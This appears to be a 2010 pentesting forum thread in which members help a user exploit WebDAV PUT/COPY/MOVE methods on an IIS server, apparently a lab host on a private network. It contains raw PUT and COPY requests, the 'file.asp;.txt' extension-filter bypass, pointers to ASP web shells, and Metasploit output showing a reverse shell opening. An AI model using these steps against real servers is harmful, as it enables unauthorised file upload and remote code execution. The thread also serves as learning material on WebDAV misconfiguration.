.

HTTP header: PUT, DELETE, etc

<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 7:37 am

HTTP header: PUT, DELETE, etc

Hi,

When I use Nikto or Nessus to scan a web server, I often get messages like this:

  Code:
+ OSVDB-0: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Allow' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OSVDB-0: HTTP method ('Allow' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
+ OSVDB-0: HTTP method ('Allow' Header): 'PROPPATCH' indicates WebDAV is installed.
+ OSVDB-425: HTTP method ('Allow' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.
+ OSVDB-0: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
+ OSVDB-5646: HTTP method ('Public' Header): 'DELETE' may allow clients to remove files on the web server.
+ OSVDB-397: HTTP method ('Public' Header): 'PUT' method could allow clients to save files on the web server.
+ OSVDB-5647: HTTP method ('Public' Header): 'MOVE' may allow clients to change file locations on the web server.
+ OSVDB-0: HTTP method ('Public' Header): 'PROPFIND' may indicate DAV/WebDAV is installed. This may be used to get directory listings if indexing is allow but a default page exists.
+ OSVDB-0: HTTP method ('Public' Header): 'PROPPATCH' indicates WebDAV is installed.
+ OSVDB-425: HTTP method ('Public' Header): 'SEARCH' indicates DAV/WebDAV is installed, and may be used to get directory listings if Index Server is running.


How can I compromise a server using one of these headers? Can I use the PUT header method to upload a file on the server?

Couldn't find anything interesting on Google...
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Thu Aug 19, 2010 8:24 am

Re: HTTP header: PUT, DELETE, etc

Those are usually indicative of WebDAV, so you could try a WebDAV client. You'll sometimes find that a OPTIONS / HTTP/1.0 will show a lot of methods like that, but you'll get a 501 Not Implemented when you try to use them. WebDAV may also require authentication. Just google HTTP <method> to see the syntax for using them manually through netcat or something.
The day you stop learning is the day you start becoming obsolete.
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu Aug 19, 2010 8:48 am

Re: HTTP header: PUT, DELETE, etc

PUT method can be used to upload a file to the server only if the directory is writable. If the user, with which the website is run, doesn't have write privileges on a directory, you won't be able to upload to that directory., even if PUT verb is allowed.

How do you find if a website allows PUT verb?
nc -v <domain or I.P> <webserver port>
OPTIONS / HTTP/1.0

How do you know if a directory is writable?
You can follow a brute-force approach and try every directory.
You can enumerate the directories used to store user ulploads like images, attachments etc and then try PUT method on each one of these.

http://upload.thinfile.com/docs/put.php
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 9:32 am

Re: HTTP header: PUT, DELETE, etc

Thanks guys

I was successful sending this (using the Burp Suite):

  Code:
PUT /test.txt HTTP/1.1
Host: 192.168.1.199
Content-Length: 6

Yesss!


Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google...
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 9:43 am

Re: HTTP header: PUT, DELETE, etc

Got some nice ASP code here:
http://classicasp.aspfaq.com/general/how-do-i-execute-a-ping-command-from-asp-and-retrieve-the-results.html

But I can't create .asp files. Only .txt...

Nothing is easy!  :-\
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu Aug 19, 2010 9:49 am

Re: HTTP header: PUT, DELETE, etc

I guess you should now be able to upload an asp script which provides a remote shell.

http://skypher.com/index.php/2010/03/04 ... en-in-asp/
Note: I've never used the above script.

Edit: I was a few seconds late.
      You should be able to create to more than just .txt files. Can you please try again?
Last edited by Xen on Thu Aug 19, 2010 9:53 am, edited 1 time in total.
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 10:02 am

Re: HTTP header: PUT, DELETE, etc

I tried again and this code doesn't work:

  Code:
PUT /test.asp HTTP/1.1
Host: 192.168.1.199
Content-Length: 6

Yesss!


These file types work:
  • .txt
  • .html
  • .htm
  • .js
  • .vbs

Maybe I am missing something in the HTTP header...
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu Aug 19, 2010 10:10 am

Re: HTTP header: PUT, DELETE, etc

Are you getting any specific error message or just the code isn't working?
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 10:21 am

Re: HTTP header: PUT, DELETE, etc

I get a 404 Object Not Found when I try to access it.

All the other ones are there. Could it be that, by default, IIS prevent us from creating .asp files remotely?
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

dynamik

Recruiters
Recruiters

Posts: 1119

Joined: Sun Nov 09, 2008 11:00 am

Location: Mile High City

Post Thu Aug 19, 2010 10:23 am

Re: HTTP header: PUT, DELETE, etc

Can you use MOVE to rename it from a txt to an asp? I'm not that familiar with this stuff, but it might be worth a try.
The day you stop learning is the day you start becoming obsolete.
<<

Xen

User avatar

Sr. Member
Sr. Member

Posts: 386

Joined: Tue Feb 03, 2009 3:59 am

Post Thu Aug 19, 2010 10:32 am

Re: HTTP header: PUT, DELETE, etc

I just read an article which might solve your problem. I didn't understand how to take elements from this article and word it exactly for your problem, so I'm just linking it here (Being just a college student, I've my limitations ;)). http://blogs.msdn.com/b/david.wang/arch ... ssion.aspx
Last edited by Xen on Thu Aug 19, 2010 10:34 am, edited 1 time in total.
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 10:45 am

Re: HTTP header: PUT, DELETE, etc

Thanks for the article, but it doesn't solve my problem... :(

I am working on COPY and MOVE right now...
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

KrisTeason

User avatar

Hero Member
Hero Member

Posts: 515

Joined: Sat Sep 08, 2007 7:48 pm

Location: /dev/null

Post Thu Aug 19, 2010 11:58 am

Re: HTTP header: PUT, DELETE, etc

Now that I can write in the web server root, I need to get a shell using asp. Any idea? I am currently searching in Google...


Maybe this may help?
http://carnal0wnage.blogspot.com/2010/05/more-with-metasploit-and-webdav.html
eCPPT (Silver/Gold), eWPT, GSEC, GISP, GCIH, OSCP, OSWP
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 1:02 pm

Re: HTTP header: PUT, DELETE, etc

Great reading!

If you try to upload an .asp you'll get a 403 forbidden or if you try to COPY/MOVE a .txt to .asp you'll get a forbidden. :-(


This is exactly my problem. But:

Thankfully there is a "feature" of 2k3 that allows you to upload evil.asp;.txt and that will bypass the filter.


I was all excited, but the server doesn't seem to be running this version of Windows (nmap -O couldn't pin point the OS...)

I tried:
  Code:
COPY /test.txt HTTP/1.1

Host: 192.168.1.199

Destination: http://192.168.1.199/test.asp;.txt


I found other things on the server, so I will poke at them for a while.

Thanks guys
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Thu Aug 19, 2010 1:13 pm

Re: HTTP header: PUT, DELETE, etc

It worked!!!

The Metasploit exploit iis_webdav_upload_asp did the trick:

  Code:
msf exploit(iis_webdav_upload_asp) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Uploading 612333 bytes to /metasploit161123510.txt...
[*] Got a 100 response, trying to read again
[*] Moving /metasploit161123510.txt to /metasploit161123510.asp...
[*] Executing /metasploit161123510.asp...
[*] Deleting /metasploit161123510.asp, this doesn't always work...
[*] Sending stage (240 bytes) to 192.168.1.199
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.199:3409) at Thu Aug 19 14:11:43 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>     


;D
OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
Next

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 1 guest

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software